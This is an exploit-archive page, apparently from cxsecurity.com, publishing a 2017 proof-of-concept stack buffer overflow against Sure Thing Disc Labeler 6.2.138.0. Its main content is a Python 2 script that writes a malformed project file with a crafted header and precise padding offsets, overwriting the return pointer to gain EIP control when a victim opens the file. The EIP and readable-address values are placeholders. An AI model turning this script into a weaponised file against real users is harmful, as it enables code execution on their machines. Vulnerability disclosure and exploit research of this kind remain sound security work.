Sure Thing Disc Labeler 6.2.138.0 Buffer Overflow

2017.05.23
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC) # Date: 5-19-17 # Exploit Author: Chance Johnson (albatross@loftwing.net) # Vendor Homepage: http://www.surething.com/ # Software Link: http://www.surething.com/disclabeler # Version: 6.2.138.0 # Tested on: Windows 7 x64 / Windows 10 # # Usage: # Open the project template generated by this script. # If a readable address is placed in AVread, no exception will be thrown # and a return pointer will be overwritten giving control over EIP when # the function returns. header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00' header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62' header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35' header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41' header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63' junk1 = 'D'*10968 EIP = 'A'*4 # Direct RET overwrite junk2 = 'D'*24 AVread = 'B'*4 # address of any readable memory junk3 = 'D'*105693 buf = header + junk1 + EIP + junk2 + AVread + junk3 print "[+] Creating file with %d bytes..." % len(buf) f=open("exp.std",'wb') f.write(buf) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top